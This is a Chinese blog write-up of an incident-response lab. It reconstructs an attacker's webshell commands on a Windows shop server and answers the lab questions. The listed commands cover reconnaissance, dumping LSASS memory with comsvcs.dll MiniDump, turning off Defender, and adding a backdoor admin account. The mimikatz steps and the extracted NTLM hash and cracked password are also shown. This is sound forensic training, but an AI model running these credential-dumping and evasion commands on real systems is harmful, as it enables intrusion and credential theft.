玄机靶场-蚂蚁爱上树

最新推荐文章于 2024-06-04 18:00:24 发布
最新推荐文章于 2024-06-04 18:00:24 发布
阅读量1.1k 收藏 9
点赞数 7
文章标签: 数据库 网络 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42467891/article/details/136249402
版权

前言:题目可知攻击者对服务器进行了权限提升、权限维持的工作,所有我们要复原出所有的攻击流量。
下面我 列出了攻击者的所有行为,具体如何解包不详细展开。

1. C:/phpStudy/PHPTutorial/WWW/onlineshop/database/onlineshop.sql
2. C:/
3. cd /d "C:/phpStudy/PHPTutorial/WWW/onlineshop"&ls&echo [S]&cd&echo [E]
4. cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&dir&echo [S]&cd&echo [E]
5. cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&whoami&echo [S]&cd&echo [E]
6. cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&whoami /priv&echo [S]&cd&echo [E]
7. cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&systeminfo&echo [S]&cd&echo [E]
8. cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&dir c:\&echo [S]&cd&echo [E]
9. cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&dir c:\temp&echo [S]&cd&echo [E]
10. cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net user&echo [S]&cd&echo [E]
11. cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net localgroup administrators&echo [S]&cd&echo [E]
12. cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net group "domain group" /domain&echo [S]&cd&echo [E]
13. cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net group "domain admins" /domain&echo [S]&cd&echo [E]
14. cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net view&echo [S]&cd&echo [E]
15. cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net share&echo [S]&cd&echo [E]
16. cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&rundll32.exe comsvcs.dll, MiniDump 852 C:\Temp\OnlineShopBackup.zip full&echo [S]&cd&echo [E]
17. cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&dir c:\temp&echo [S]&cd&echo [E]
18. cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&rundll32.exe comsvcs.dll, MiniDump 852 C:\OnlineShopBackup.zip full&echo [S]&cd&echo [E]
19. cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&ls&echo [S]&cd&echo [E]
20. cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&dir&echo [S]&cd&echo [E]
21. cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&copy store.php c:\temp&echo [S]&cd&echo [E]
22. cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&dir c:\temp&echo [S]&cd&echo [E]
23. cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&powershell -ep bypass Set-Mppreference -DisableRaltimeMonitoring $true&echo [S]&cd&echo [E]
24. cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&powershell -ep bypass Set-Mppreference -DisableRealtimeMonitoring $true&echo [S]&cd&echo [E]
25. cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&powershell -ep bypass Get-MpComputerStatus&echo [S]&cd&echo [E]
26. cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&rundll32.exe comsvcs.dll, MiniDump 852 C:\temp\OnlineShopBackup.zip full&echo [S]&cd&echo [E]
27. cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&dir c:\temp&echo [S]&cd&echo [E]
28. C:/phpStudy/
29. C:/Temp/
30. C:/Temp/OnlineShopBack.zip
31. C:/Windows/
32. C:/Windows/Temp/
33. cd /d "C:/phpStudy/PHPTutorial/WWW/onlineshop"&dir c:\windows\system32&echo [S]&cd&echo [E]
34. cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&dir c:\windows\config&echo [S]&cd&echo [E]
35. cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net user&echo [S]&cd&echo [E]
36. cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net user admin Password1 /add&echo [S]&cd&echo [E]
37. cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net localgroup administrators admin /add&echo [S]&cd&echo [E]
38. cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net user&echo [S]&cd&echo [E

1.由以上36条命令可以知晓,第一题 admin 的密码为 Password1 
2.由以上26 条命令可以知晓,第二题 lassa.exe 的进程 id 为852,这里用到了使用rundll32直接执行comsvcs.dll的导出函数MiniDump来Dump进程内存
3.通过流量报文分析,发现转储出了 OnlineShopBackup.zip 文件,该文件存在在了 30 条命令中,我们对其进行导出,使用二进制文件打开发现其为.dmp 文件但无法正常打开,对比常规dmp 文件发现文件头多了e1c1709 这几个字符,删除后文件恢复正常。

4.使用 mimikatz加载 dmp文件:sekurlsa::minidump C:\\Desktop\mimikatz_trunk\Win32\test.dmp
5.获取密文:sekurlsa::logonpasswords
msv :
         [00000003] Primary
         * Username : win101
         * Domain   : VULNTARGET
         * NTLM     : 282d975e35846022476068ab5a3d72df
         * SHA1     : bc9ecca8d006d8152bd51db558221a0540c9d604
         * DPAPI    : 8d6103509e746ac0ed9641f7c21d7cf7
        tspkg :
        wdigest :
         * Username : win101
         * Domain   : VULNTARGET
         * Password : (null)
        kerberos :
         * Username : win101
         * Domain   : VULNTARGET.COM
         * Password : (null)
        ssp :
        credman :
        cloudap :

6.进行密码碰撞,使用 hashcat 或者在线破解NTLM即可,最终 win101的密码 为 admin#123.

ceLS
关注
  • 7
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
玄机应急-蚂蚁
2302_76737871的博客
04-10 959
在这一个(2120 235.537016749 10.0.10.88 10.0.10.99 HTTP 1209 POST /onlineshop/product2.php HTTP/1.1 (application/x-www-form-urlencoded))请求中我们看到了蚁剑的webshell,我们对其进行跟踪。通过对黑客的命令进行分析发现了一个名字为OnlineShopBackup.zip的压缩包,这里我们使用十六进制搜索504b0304,发现有压缩文件,我们进行追踪。具体来说,它会生成一个名为。
生活与哲学+第一讲+探寻母题的意图+把脉命题的玄机课件--名师微课堂(自制).ppt
11-21
生活与哲学+第一讲+探寻母题的意图+把脉命题的玄机课件--名师微课堂(自制).ppt
玄机靶场 第一章 应急响应- Linux入侵排查
最新发布
qq_46343633的博客
06-04 599
1.web目录存在木马,请找到木马的密码提交2.服务器疑似存在不死马,请找到不死马的密码提交3.不死马是通过哪个文件生成的,请提交文件名4.黑客留下了木马文件,请找出黑客的服务器ip提交5.黑客留下了木马文件,请找出黑客服务器开启的监端口提交。
玄机靶场webshell的查杀
来而不往非礼也
05-10 1635
等了好久终于抽到了玄机靶场邀请码,今天来体验一下,记录下自己的学习过程。靶机账号密码 root xjwebshell1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}2.黑客使用的什么工具的shell github地址的md5 flag{md5}3.黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx4.黑客免杀马完整路径 md5 flag{md5}
[应急响应]
weixin_47920370的博客
04-22 4080
一、应急响应过程 目的:分析攻击时间、攻击操作、攻击结果、安全修复等并给出合理的解决方案 保护阶段:直接断网,保护现场,看是否能够恢复数据 分析阶段:对入侵过程进行分析,常见方法为指纹库搜索、日志时间分析、后门追查分析、漏洞检查分析等 复现阶段:还原攻击过程,模拟攻击者入侵思路,关注攻击者在系统中应用的漏洞、手法 修复阶段:分析原因后,修补相关系统、应用漏洞,如果存在后门或弱口令,及时清除并整改 建议阶段:对攻击者利用的漏洞进行修补,加强系统安全同时提高安全意识 二、必备知识点 1、熟悉常用的web安
玄机靶场apache日志
来而不往非礼也
05-10 874
今天主要记录的是玄机靶场第二章apache日志分析,主要内容是日志分析。以下是题目要求账号密码 root apacherizhi1、提交当天访问次数最多的IP,即黑客IP:2、黑客使用的浏览器指纹是什么,提交指纹的md5:3、查看index.php页面被访问的次数,提交次数:4、查看黑客IP访问了多少次,提交次数:5、查看2023年8月03日8时这一个小时内有多少IP访问,提交次数:先用xshell连一下。我们不妨对一些可能出现的高频日志分析的语句进行整理统计访问量最高的IP地址。
【置顶】:文章合集系列
一只爱吃橙子的羊
02-13 1093
【置顶】:文章合集系列
玄机-Wordpress-应急响应-WP
weixin_42467891的博客
02-23 1209
前言,日志分析题目我们要先查看攻击者特征和 ip 等,靶场环境是 nginx 的,我们去找 nginx的日志。通过分析可以得出以下日志可均为攻击日志的特征,该日志使用 webshell 执行了系统命令,以该日志为基准完成改题目。
玄机靶场】Linux入侵排查
yujiahui0203的博客
05-17 555
玄机靶场,Linux入侵排查,webshell
玄机】应急响应-Linux日志分析
qq_40923603的博客
02-23 1982
1.有多少IP在爆破主机ssh的root帐号,如果有多个使用","分割。2.ssh爆破成功登陆的IP是多少,如果有多个使用","分割。3.爆破用户名字典是什么?如果有多个使用","分割。5.黑客登陆主机后新建了一个后门用户,用户名是多少。4.登陆成功的IP共爆破了多少次。
玄机靶场】Linux日志分析
yujiahui0203的博客
05-16 895
from/ 捕获括号中的内容,即登录失败的用户名。这条命令主要是在auth.log.1文件中找到包含“Failed password for root”字符串的一行,从中提取出IP信息,并且对其进行了统计,即爆破次数。这是第一次做应急响应的靶场,也是本小白的第一篇文章,其实也有很多不懂的地方,大多都是在网上查找资料完成的,这其中一些命令我这里说明的不详细,这里有篇文章写的很详细。比较重要的几个文件:登录错误信息(btmp),登录成功(wtmp),最后一次登录(lastlog),登录日志(secure)
精美影像背后的技术玄机
12-09
精美影像背后的技术玄机 安捷伦科技公司传感器解决方案全球战略营销经理 Feisal Mosleh 影像是如何生成的? 在使用普通的传统相机时,光学系统把捕捉到的光打在胶卷上,随后人们就可以通过一个化学过程对其进行曝光...
玄机论坛Msdn5_2016基础课程.pdf
10-18
玄机论坛Msdn5_2016基础课程.pdf
Pinyin4j的基本用法 - 玄机逸士的专栏 - 博客频道 - CSDN.NET.html
12-09
Pinyin4j的基本用法 - 玄机逸士的专栏 - 博客频道 - CSDN.NET.html )
玄机靶场】第二章日志分析-mysql应急响应
yujiahui0203的博客
05-20 1087
mysql应急响应 ssh账号 root 密码 xjmysql1.黑客第一次写入的shell flag{关键字符串}2.黑客反弹shell的ip flag{ip}3.黑客提权文件的完整路径 md5 flag{md5} 注 /xxx/xxx/xxx/xxx/xxx.xx4.黑客获取的权限 flag{whoami后的值}
玄机】-----应急响应
m0_63138919的博客
05-13 1711
玄机应急响应 题解 一起学习
玄机-Wordpress-应急响应-WP_玄机应急响应,网络安全研发岗面试复盘总
2401_84301389的博客
04-11 1091
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
7-14 房号的玄机 (5 分pta
04-06
这句话的意思是:7-14房号的玄机(神秘)是5分钱(指价值很小)。 注:这句话来自中国传统的风水学,认为每个房间都有一定的玄机,即因地制宜、遵循自然规律的布局方式,能够带来吉祥和好运。而5分钱的比喻,则是指这个玄机不太实用或者价值不高。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值